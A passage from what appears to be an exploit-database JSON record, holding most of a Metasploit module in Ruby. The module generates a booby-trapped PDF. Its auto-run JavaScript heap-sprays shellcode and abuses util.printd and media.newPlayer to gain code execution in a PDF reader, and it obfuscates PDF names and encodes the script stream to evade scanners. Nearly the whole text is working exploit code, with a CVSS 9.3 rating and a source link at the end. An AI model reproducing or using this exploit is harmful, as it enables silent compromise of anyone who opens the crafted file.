2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape([target.ret].pack('V'))\r\n\r\n\t\t# Randomize variables\r\n\t\t#\r\n\t\tlen = 72\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\t\trand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\r\n\t\tvtbuf = [target.ret].pack('V') * 4\r\n\t\tvtbuf << rand_text_alpha(len - vtbuf.length)\r\n\t\tvtbuf.gsub!(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\t\tretstring = Rex::Text.to_unescape(vtbuf)\r\n\r\n\t\t# The printd strings are 72 bytes (??)\r\n\t\tscript = %Q|\r\nvar #{rand1} = unescape(\"#{shellcode}\");\r\nvar #{rand2} = unescape(\"#{nops}\");\r\nvar #{rand3} = unescape(\"#{retstring}\");\r\n\r\nwhile(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};\r\n\t#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);\r\n\r\nmemory=new Array();\r\n\r\nfor(i=0;i<0x2000;i++) {\r\n\tmemory[i]= #{rand2} + #{rand1};\r\n}\r\n\r\nutil.printd(\"#{rand4}\", new Date());\r\nutil.printd(\"#{rand5}\", new Date());\r\ntry {this.media.newPlayer(null);} catch(e) {}\r\nutil.printd(#{rand3}, new Date());\r\n|\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(script)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\r\n\tend\r\n\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(js)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16623/"}]}